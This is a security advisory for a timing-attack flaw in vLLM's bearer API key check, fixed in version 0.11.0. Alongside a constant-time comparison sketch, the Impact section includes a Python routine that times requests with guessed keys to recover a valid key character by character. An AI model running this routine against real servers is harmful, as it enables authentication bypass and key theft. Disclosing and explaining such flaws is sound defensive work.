Description
vLLM is vulnerable to a timing attack on bearer authentication
Summary
The API key support in vLLM performed validation using a method that was vulnerable to a timing attack. This could allow an attacker to discover a valid API key more efficiently than by brute force.
Details
API key validation used a string comparison that takes longer the more leading characters of the provided API key are correct. Statistical analysis across many attempts can allow an attacker to detect when the next correct character in the key sequence has been found.
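As an illustration only (a minimal sketch, not the actual vLLM code; the key value and function names are made up), the difference between an early-exit string comparison and a constant-time check in Python:

```python
import hmac

EXPECTED_KEY = "sk-example-key"  # placeholder value, not a real credential

def check_key_naive(provided: str) -> bool:
    # Plain equality short-circuits at the first mismatching character,
    # so rejection time grows with the length of the correct prefix.
    return provided == EXPECTED_KEY

def check_key_constant_time(provided: str) -> bool:
    # hmac.compare_digest takes time independent of where the mismatch
    # occurs, removing the timing side channel.
    return hmac.compare_digest(provided.encode(), EXPECTED_KEY.encode())
```

In the bearer-auth case, a constant-time comparison of this kind would be applied to the token extracted from the Authorization header.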
Impact
Deployments relying on vLLM's built-in API key validation are vulnerable to authentication bypass using this technique.
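To make the "analysis across many attempts" concrete, the following is a hedged sketch of how such timing measurements could be aggregated; the endpoint URL, sample count, and character set are illustrative assumptions rather than details from the advisory, and a real attack would require far more samples and noise filtering:

```python
import statistics
import string
import time
import urllib.request

BASE_URL = "http://localhost:8000/v1/models"  # hypothetical vLLM endpoint

def time_attempt(candidate_key: str) -> float:
    # Send one request with a guessed key and measure the response latency.
    req = urllib.request.Request(
        BASE_URL, headers={"Authorization": f"Bearer {candidate_key}"}
    )
    start = time.perf_counter()
    try:
        urllib.request.urlopen(req, timeout=5).read()
    except Exception:
        pass  # rejected (401) responses still carry the timing signal
    return time.perf_counter() - start

def guess_next_character(known_prefix: str, samples: int = 50) -> str:
    # Collect many samples per candidate character and compare medians:
    # the candidate extending the correct prefix tends to take longest to reject.
    alphabet = string.ascii_letters + string.digits + "-_"
    medians = {
        ch: statistics.median(
            time_attempt(known_prefix + ch) for _ in range(samples)
        )
        for ch in alphabet
    }
    return max(medians, key=medians.get)
```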
References
- https://github.com/vllm-project/vllm/security/advisories/GHSA-wr9h-g72x-mwhm
- https://nvd.nist.gov/vuln/detail/CVE-2025-59425
- https://github.com/vllm-project/vllm/commit/ee10d7e6ff5875386c7f136ce8b5f525c8fcef48
- https://github.com/vllm-project/vllm/blob/4b946d693e0af15740e9ca9c0e059d5f333b1083/vllm/entrypoints/openai/api_server.py#L1270-L1274
- https://github.com/vllm-project/vllm/releases/tag/v0.11.0
Packages
vllm
Affected versions: < 0.11.0
Fixed version: 0.11.0
Related vulnerabilities
vLLM is an inference and serving engine for large language models (LLMs). Before version 0.11.0rc2, the API key support in vLLM performed validation using a method that was vulnerable to a timing attack. API key validation used a string comparison that takes longer the more characters of the provided API key are correct. Data analysis across many attempts could allow an attacker to determine when the next correct character in the key sequence has been found. Deployments relying on vLLM's built-in API key validation are vulnerable to authentication bypass using this technique. Version 0.11.0rc2 fixes the issue.
A vulnerability in the AuthenticationMiddleware class of vLLM, a library for working with large language models (LLMs), that allows an attacker to bypass security restrictions and disclose protected information.